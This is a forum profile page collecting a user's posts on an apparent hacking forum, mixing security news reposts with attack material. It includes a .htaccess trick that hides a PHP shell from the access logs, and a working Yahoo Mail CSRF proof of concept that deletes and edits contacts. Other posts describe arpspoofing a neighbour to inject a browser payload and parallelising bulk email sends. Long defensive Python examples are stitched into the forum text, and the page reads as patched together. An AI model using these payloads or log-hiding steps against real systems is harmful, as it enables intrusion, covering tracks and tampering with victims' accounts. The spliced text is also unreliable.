
Pugna

Active Members
  • Posts: 234
  • Days Won: 1

Everything posted by Pugna

  1. A Google researcher has resurrected an attack that allows website operators to steal the browsing history of visitors almost a year after all major browser makers introduced changes to close the gaping privacy hole. Proof-of-concept code recently posted by Google security researcher Michal Zalewski works against the majority of people using the Internet Explorer, Chrome, and Firefox browsers. In an informal test carried out by The Register, the attack was able to list recently visited sites on computers running both Microsoft Windows and Apple OS X. It worked even though all three browser makers have patched their wares to stop them from divulging the addresses of sites visited over the past month or so.

    “My proof of concept is fairly crude, and will fail for a minority of readers,” Zalewski wrote. “But in my testing, it offers reliable, high-performance, non-destructive cache inspection that blurs the boundary between :visited and all the 'less interesting' techniques.”

    Previous exploits usually exploited a mechanism built into all browsers that causes recently visited websites to appear differently than non-visited sites. Attacks based on the CSS, or cascading style sheet, definitions weren't merely theoretical. Last year, academic researchers caught YouPorn.com and 45 other sites pilfering visitors' surfing habits by targeting the browser vulnerability, which first came to light more than a decade earlier.

    Zalewski said browser makers closed the hole by “severely crippling” CSS functions built around the :visited selectors. His proof-of-concept, according to comments accompanying the source code (link may not work in all browsers), takes a different approach known as cache timing. It starts by loading an iframe tag containing a list of websites into the page accessed by the visitor. It then calculates how quickly the websites are rendered. Those that load more quickly must be stored in the browser cache, an indication they have been visited recently.

    Cache timing has long been identified as a way to extract browsing history, as noted in a well-known paper (PDF) penned by Princeton University computer scientist Ed Felten. Up to now, the problem with the approach has been that the attacks were slow and easy to detect, making them impractical. Zalewski said his method was able to overcome these disadvantages by allowing browsers to abort the underlying request quickly. As a result, it's able to test about 50 websites per second with no visible signs that anything is amiss. With minor tweaks – including optimizations, parallelism, and possibly a delay calibration – the code could be capable of detecting “several hundred” URLs. Source: theregister.
  2. By making use of a technique called DNS poisoning, a cyberattacker managed to take down the websites of Samsung, Google, Gmail, YouTube, Yahoo, Apple, Linux, Microsoft and Hotmail hosted on the .cd domain extension which belongs to the Democratic Republic of Congo. The hacker who calls himself AlpHaNiX managed to deface all the locations by inserting fake records into the cache of DNS servers, reports Security Web-Center. By doing this, the attacker can make sure that he can alter the responses to a DNS query, forcing the Internet users to a fake website instead of a real one.

    Even though DNS cache poisoning is a method favored by many hackers thanks to its efficiency, it's not easy to execute, in most cases the Domain Name System servers being provided by Internet service providers (ISPs) and organizations. Judging by the messages left on the defaced websites, the hacker didn’t have anything “personal” with them, he just wanted to show his powers. Also, since the sites proudly display a Tunisian flag along with the message “Tunisia Rullz,” we can only assume that the hacker originates from Tunisia.

    At the time of writing, Gmail.cd, Google.cd, Linux.cd, Samsung.cd, Hotmail.cd and Apple.cd are still defaced, while Youtube.cd was taken down altogether. When trying to access Microsoft or Yahoo!, I am automatically redirected to .com domains, which means that steps are already taken to resolve the issue. A few days ago we witnessed how websites belonging to NOD32 and Kaspersky were breached and defaced by hackers. At the time it turned out that Kaspersky’s site wasn’t actually legitimate, instead it was being set up by typosquatters who relied on the misspelled names of a site to lure users to their malicious locations. Source: softpedia.
  3. Stop flapping your little wings because he won; if you were in his place you wouldn't be saying anything.
  4. Source: GGlist

    I like it, nice.
  5. Since the current Convention for the Protection of Individuals that addresses the matter of personal data protection and processing is dated from 1981, when the Internet was nowhere near what it has become today, the Council of Europe proposed a revised version. The existing convention is employed by 43 countries and others have already expressed their interest in it, but since it’s not in line with the current problems faced by organizations, they plan on keeping the current framework, but modify it to make sure it’s more relevant. “I think that certainly the fact that you have more and more privacy issues on the news, it's raised first general public opinion on those issues, but indeed also the fact that we know that we have a protective framework which is there, but maybe we need to make sure that those cases are not repeated,” Sophie Kwasny, secretary to the Consultative Committee of the Council of Europe data protection convention, said for VR-Zone. “All those cases have definitely raised awareness ... of the fact that some of the legislations in place did not sufficiently cover some of the new threats to privacy.” The main purpose of the update will be to strengthen the rights of individuals and, if so far there has been no clear distinction between data controllers and processors, from now on there will be one. Privacy by design is a term that will have to be regarded seriously by all the businesses that handle and process personal data. If some organizations are already aware of this and are taking steps in implementing the principle, others will be forced to do so after the new law kicks in. To make sure they won’t feel like they’re losing national sovereignty, the 50 or so countries that will sign the upcoming agreement will have the chance to enforce the new regulations in their own way.
  6. I want to help you, but I don't want to struggle to understand what you are trying to do. Be more explicit and I'll give you the solution.
  7. Russian security vendor Kaspersky Lab is to pull out of the Business Software Alliance (BSA) because of the anti-copyright infringement body's support for the controversial US Stop Online Piracy Act (SOPA). Kaspersky Lab founder and chief executive Eugene Kaspersky confirmed via Twitter a story published in Russian newspaper Izvestia last week saying that the country's largest technology firm will withdraw its support for the lobby group from 1 January. "Yes, we're leaving BSA because of their support for #SOPA. I'll come out with a blog post re this issue," he tweeted on Monday. "#SOPA is the vinyl-era legislation trying to manage the industry that requires a different approach," he added in a further update. The BSA numbers most of the largest technology companies in the world among its members, and produces an annual report detailing what it claims to be the growing cost to these firms of software piracy. However, the BSA has itself raised objections to the hugely controversial SOPA legislation, which threatens to polarise opinion in the US as the Digital Economy Act did in the UK last year. The BSA initially commended the US government for drawing up plans to combat software piracy and copyright-infringing web sites, but said last month that the plans need more balance and should contain clearer legal definitions regarding the kinds of site SOPA will target. "Valid and important questions have been raised about the bill. It is intended to get at the worst of the worst offenders. As it now stands, however, it could sweep in more than just truly egregious actors," warned BSA president and chief executive Robert Holleyman in a statement at the time. "Due process, free speech and privacy are rights which cannot be compromised. And the security of networks and communications is indispensable to a thriving internet economy." 
    However, despite the BSA's modified stance on the proposed legislation, Kaspersky Lab seems set on leaving and will release a more formal statement on the matter soon. Source: V3.
  8. It was already posted: http://rstcenter.com/forum/44226-intercepter-ng-new-sniffing-tool.rst
  9. You could have made good money. Stop rushing.
  10. OK, you generated the MAC, but where do you change it?
  11. fsockopen() over UDP does a much better job.
  12. It's like having a child and asking us what name to give it. It's your project, you know best. Think of a name that contains "IT", "Online", "News", "HOWTO". I don't want to discourage you, but there are already thousands of them on the net. Your momentum will fade within two weeks at most, but the experience counts.
  13. Try booting it in safe mode or with Last Known Good Configuration. I don't see any other option.
  14. A small trick in .htaccess to disable logging for a particular file that you access (e.g. a PHP shell):

      SetEnvIf Request_URI "^/dir/file\.php$" dontlog
      <Limit GET POST HEAD>
      order deny,allow
      deny from all
      allow from 127.0.0.1
      # or the remote IP of the server
      </Limit>
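From the defender's side, a SetEnvIf on Request_URI only blinds the access log when a server-level CustomLog already carries an env=!<var> condition, and a pattern that singles out one script path is worth flagging during a config audit. The following is an added example, not code from the post or from Apache: find_log_suppression, the severity labels and the two sample configs are constructed for illustration.

```python
"""Audit Apache config / .htaccess text for directives that can hide requests
from the access log. Added example: the function name, severity labels and
the sample configs are constructed, not taken from the forum post."""
import re
from typing import Dict, List

# SetEnvIf[NoCase] <attribute> <regex> <var>[=value]; the regex may be quoted
SETENVIF_RE = re.compile(
    r'^\s*SetEnvIf(?:NoCase)?\s+(?P<attr>\S+)\s+'
    r'(?:"(?P<qpat>[^"]*)"|(?P<pat>\S+))\s+(?P<var>!?\w+)',
    re.IGNORECASE,
)
# CustomLog/TransferLog ... env=!<var> skips logging when <var> is set
CUSTOMLOG_RE = re.compile(
    r'^\s*(?:CustomLog|TransferLog)\b.*\benv=(?P<cond>!?\w+)', re.IGNORECASE
)
# URI patterns that single out server-side scripts rather than static assets
SCRIPT_EXT_RE = re.compile(r'\\?\.(?:php\d?|phtml|cgi|pl|py|aspx?|jsp)\b', re.IGNORECASE)


def find_log_suppression(config_text: str) -> List[Dict[str, object]]:
    """One finding per SetEnvIf on Request_URI that can suppress logging.

    severity: high   = a CustomLog in the same text excludes this variable and
                       the pattern targets a script (single-file log blinding)
              info   = excluded variable, but the pattern looks like static assets
              medium = variable named like a log switch (e.g. dontlog) on a script
                       path; the CustomLog may live in a server config not scanned
              low    = variable named like a log switch on a non-script path
    """
    setenv = []        # (line_no, attribute, uri pattern, variable)
    excluded = set()   # variables that some CustomLog env=!<var> condition excludes
    for line_no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = SETENVIF_RE.match(line)
        if m:
            pattern = m.group("qpat") if m.group("qpat") is not None else m.group("pat")
            setenv.append((line_no, m.group("attr"), pattern, m.group("var").lstrip("!")))
            continue
        m = CUSTOMLOG_RE.match(line)
        if m and m.group("cond").startswith("!"):
            excluded.add(m.group("cond")[1:].lower())

    findings = []
    for line_no, attr, pattern, var in setenv:
        if attr.lower() != "request_uri":
            continue
        targets_script = bool(SCRIPT_EXT_RE.search(pattern))
        if var.lower() in excluded:
            severity = "high" if targets_script else "info"
        elif "log" in var.lower():
            severity = "medium" if targets_script else "low"
        else:
            continue
        findings.append({"line": line_no, "uri_pattern": pattern,
                         "env_var": var, "severity": severity})
    return findings


# Constructed samples: a server config that wires "dontlog" into CustomLog (a
# common way to keep image hits out of the log), and a directory .htaccess in
# the style discussed above.
SERVER_CONF = """
LogFormat "%h %l %u %t \\"%r\\" %>s %b" common
SetEnvIf Request_URI "\\.(gif|png)$" dontlog
CustomLog /var/log/apache2/access.log common env=!dontlog
"""
HTACCESS = """
SetEnvIf Request_URI "^/dir/file\\.php$" dontlog
<Limit GET POST HEAD>
order deny,allow
deny from all
allow from 127.0.0.1
</Limit>
"""

if __name__ == "__main__":
    for f in find_log_suppression(SERVER_CONF + HTACCESS):
        print(f"line {f['line']:>3}  {f['severity']:<6}  {f['env_var']}  {f['uri_pattern']}")
```

Run over the server config and the .htaccess together, the static-asset exclusion comes back as "info" while the single-script exclusion is "high"; scanned on its own, the .htaccess still produces a "medium" finding because the variable name gives the intent away even though the CustomLog is out of sight. Feeding every .htaccess under the document root plus the server's own config into this function is the useful audit.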
  15. No idea, I just offered you a handy solution; without administrator rights it won't apply the changes anyway. It works perfectly for me.
  16. Regarding TOR: Why Tor Has Failed But I2P Will Not. It's one point of view. Read more about I2P.
  17. Recently leaked online chat records may provide the closest look yet at a Russian man awaiting trial in Wisconsin on charges of running a cybercrime machine once responsible for sending between 30 to 40 percent of the world’s junk email. Oleg Y. Nikolaenko, a 24-year-old who’s been dubbed “The King of Spam,” was arrested by authorities in November 2010 as he visited a car show in Las Vegas. The U.S. Justice Department alleges that Nikolaenko, using the online nickname “Docent,” earned hundreds of thousands of dollars using his “Mega-D” botnet, which authorities say infected more than half a million PCs and could send over 10 billion spam messages a day. Nikolaenko has pleaded not guilty to the charges, and is slated to appear in court this week for a status conference (PDF) on his case.

    The Justice Department alleges that Nikolaenko spammed on behalf of Lance Atkinson and other members of Affking, an affiliate program that marketed fly-by-night online pharmacies and knockoff designer goods. Atkinson told prosecutors that one of his two largest Russian spamming affiliates used the online moniker Docent. He also said that Docent received payment via an ePassporte account under the name “Genbucks_dcent.” FBI agents later learned that the account was registered in Nikolaenko’s name and address in Russia, and that the email address attached to the account was 4docent@gmail.com.

    According to my research, Docent also spammed for other rogue pharmacy programs. In fact, it’s hard to find one that didn’t pay him to send spam. In my Pharma Wars series, I’ve detailed how Russian cybercrime investigators probing the operations of the massive GlavMed/SpamIt rogue pharmacy operation seized thousands of chat logs from one of its principal organizers. The chats were later leaked online and to select journalists.

    Within those records are hundreds of hours of chats between the owners of the pharmacy program and many of the world’s biggest spammers, including dozens with one of its top earners, Docent. According to the SpamIt records, Docent earned commissions totaling more than $325,000 promoting SpamIt pharmacy sites through spam between 2007 and 2010. The Docent in the SpamIt database also had his earnings sent to the same ePassporte account identified by the FBI. The Docent in the leaked chats never references himself as Nikolaevich, but in several cases he asks SpamIt coordinators to send documents to him at the 4docent@gmail.com address.

    The chats between Docent and Stupin show a young man who is ultra-confident in the value and sheer spam-blasting power of his botnet. Below are the first in a series of conversation snippets between Docent and SpamIt co-administrator Dmitry Stupin. Before each is a brief note providing some context.

    In the transcript that follows, Stupin tries to woo Docent to join SpamIt. Docent negotiates a much higher commission rate than is usually given to new spamming partners. The typical rate is 30 percent of each sale, but Docent is a known figure in the spamming underground, and argues that his botnet will bring such massive traffic to the SpamIt pharmacies that he deserves a higher 45 or 50 percent cut of the sales. This conversation was recorded on Feb. 1, 2007.

    == Approximately one week later….. ===

    == Two days later, Docent is signed up with SpamIt, but has not yet started spamming for the affiliate program directly. In this chat, however, he obtains referral codes on behalf of two other spammers who want to join SpamIt; all of the affiliates he brings in will pay a portion of their commissions to Docent as a referral fee. ===

    In the conversation below, recorded Nov. 23, 2007, Docent and Stupin discuss earnings of two SpamIt affiliates referred to the program by Docent. One of them, who uses the nickname “Cosma,” eventually becomes one of SpamIt’s all-time top earners. According to Microsoft, Cosma was the individual behind the Rustock spam botnet. The other referred affiliate is an American spammer who used the nicknames “Speedy” and “Lightspeed.” Source: krebs.
  18. # Vulnerability found in - Yahoomail Delete Contact module
    # email prakhar.agrawal26@gmail.com
    # company AKS IT Services Pvt. Ltd
    # Credit by Prakar Agrawal
    # Email Service Yahoomail
    # Category Mail service
    # Site page http://www.yahoomail.com
    # Platform java
    # Proof of concept
    # Targeted URL: http://address.mail.yahoo.com/

    Script to delete the contacts from the contact list through Cross Site Request Forgery.

      <html>
      <body>
      <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
      <input type=hidden name="action" value="delete_contacts">
      <input type=hidden name="id" value="$Numeric No.$">
      </form>
      <script>document.csrf.submit();</script>
      </body>
      </html>

    Put any numeric number (i.e. 1, 2, 3, 4 etc.) in the id field parameter and try to forge the functionality. It's working.....

    ________________________________________________________________________

    I tested it, it works. I tried the same thing for editing, with the appropriate changes:

      <html>
      <body>
      <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/EditContact.json?" method="POST">
      <input type=hidden name="action" value="edit_contact">
      <input type=hidden name="contact_id" value="16777820">
      <input type=hidden name="fields[0:1::16778515:1]" value="^[eOo]^[PrInCeSs]^">
      <input type=hidden name="fields[0:3::16778515:1]" value="DeeAYYY">
      <input type=hidden name="flags[8:::16778516:1]" value="8:::0:0">
      <input type=hidden name="fields[8:::16778516:1]" value="sw33t_babygirl_007">
      <input type=hidden name="flags[7::3:0:1]" value="7::3:0:0">
      <input type=hidden name="flags[7::0:0:1]" value="7::0:0:0">
      <input type=hidden name="flags[17:::0:1]" value="17:::0:0">
      <input type=hidden name="flags[18:::0:1]" value="18:::0:0">
      </form>
      <script>document.csrf.submit();</script>
      </body>
      </html>

    But I get a 500 Internal in the headers. The strange thing is that the delete works. What is the point of the _crumb token if we have CSRF?
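On the question of what a crumb token is for: it only protects an endpoint if the server refuses requests that arrive without a valid one, and the PoC's auto-submitting form carries no token at all. The following is an added example of how such a check is normally implemented server-side; it is not Yahoo's code or the post's. The names issue_crumb and handle_delete_contact, the origin https://mail.example and the session identifiers are assumptions made for illustration.

```python
"""Server-side CSRF protection for a state-changing endpoint such as a
contact-delete action. Added example, not the web app's own code; names,
origin and session ids below are constructed."""
import hashlib
import hmac
import secrets
from typing import Mapping, Optional, Tuple
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)         # per-deployment secret (generated here)
ALLOWED_ORIGINS = {"https://mail.example"}   # assumed origin of the real web app


def issue_crumb(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Per-session token that the real page embeds in its forms.

    A cross-site page can make the browser POST with the victim's cookies, but
    the same-origin policy stops it from reading the victim's page, so it
    cannot learn this value and cannot include it in the forged form.
    """
    return hmac.new(key, b"csrf:" + session_id.encode(), hashlib.sha256).hexdigest()


def crumb_is_valid(session_id: str, submitted: Optional[str],
                   key: bytes = SERVER_KEY) -> bool:
    """Constant-time comparison; a missing token is simply invalid."""
    if not submitted:
        return False
    return hmac.compare_digest(issue_crumb(session_id, key), submitted)


def origin_is_allowed(headers: Mapping[str, str]) -> bool:
    """Defence in depth: browsers attach Origin (or Referer) to cross-site POSTs."""
    origin = headers.get("Origin")
    if origin is None and headers.get("Referer"):
        parts = urlsplit(headers["Referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in ALLOWED_ORIGINS


def handle_delete_contact(session_id: str, headers: Mapping[str, str],
                          form: Mapping[str, str],
                          key: bytes = SERVER_KEY) -> Tuple[int, str]:
    """Checks a delete endpoint should run before touching any data."""
    if form.get("action") != "delete_contacts":
        return 400, "unknown action"
    if not origin_is_allowed(headers):
        return 403, "request did not come from this site"
    if not crumb_is_valid(session_id, form.get("_crumb"), key):
        return 403, "missing or invalid _crumb"
    contact_id = form.get("id", "")
    if not contact_id.isdigit():
        return 400, "bad contact id"
    return 200, f"contact {contact_id} deleted"   # a real handler would act here


if __name__ == "__main__":
    sid = "session-of-victim"   # constructed session identifier
    # 1) the auto-submitting form from the PoC: foreign origin, no token
    forged = {"action": "delete_contacts", "id": "3"}
    print(handle_delete_contact(sid, {"Origin": "https://attacker.example"}, forged))
    # 2) the same action submitted from the real page, which carries its crumb
    legit = dict(forged, _crumb=issue_crumb(sid))
    print(handle_delete_contact(sid, {"Origin": "https://mail.example"}, legit))
```

Binding the token to the session is what makes it worthwhile: a crumb lifted from the attacker's own account does not validate for the victim's session. The Origin/Referer check is the secondary control, kept because some older clients omit those headers and because it costs nothing; the token check is the one that must never be skipped for a POST that changes state.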
  19. Yes, simple; now everyone finds their own use for it. Once connected to the router I get the WLAN password, connect to the wireless (if we're talking about the same subnet I suppose he's my neighbour), do an arpspoof, throw a payload into his browser and get access. Delicate and nice.
  20. You're jumping to conclusions for no reason. The installer is from their official site, and Technium has a track record. It gets detected because of the functions it has. False positive: http://forums.cnet.com/7723-21574_102-546820.html
  21. No idea; when I needed them I wrote them myself, and time has passed and I can't find them anymore to share with you.
  22. You can make it faster. I've seen "multithread" implementations in bash. multi.bash:

      nohup send.php $1 $2 &

    Through multi.bash you pass send.php two limits as arguments, which are two line boundaries in a file containing the emails.

      multi.bash 0 10  =>  nohup send.php 0 10 &

    That is, send.php takes all the emails between lines 0 - 10 inclusive and sends them. If you write another bash script with a for loop that runs multi.bash each time you increase the arguments, you have "multithread". In the process list you'll find:

      ./multi.bash 0 10
      ./multi.bash 11 20
      ./multi.bash 21 30
      ./multi.bash 31 40
      ...

    If you find it useful, contact me by email if you want help.
  23. COM port? For POS terminals, I guess. No, it doesn't sniff.
  24. Pretty ... crude. The only thing I liked out of what you wrote is:

      cat $1 |sort |uniq >list.txt

    The rest is just an implementation of the need.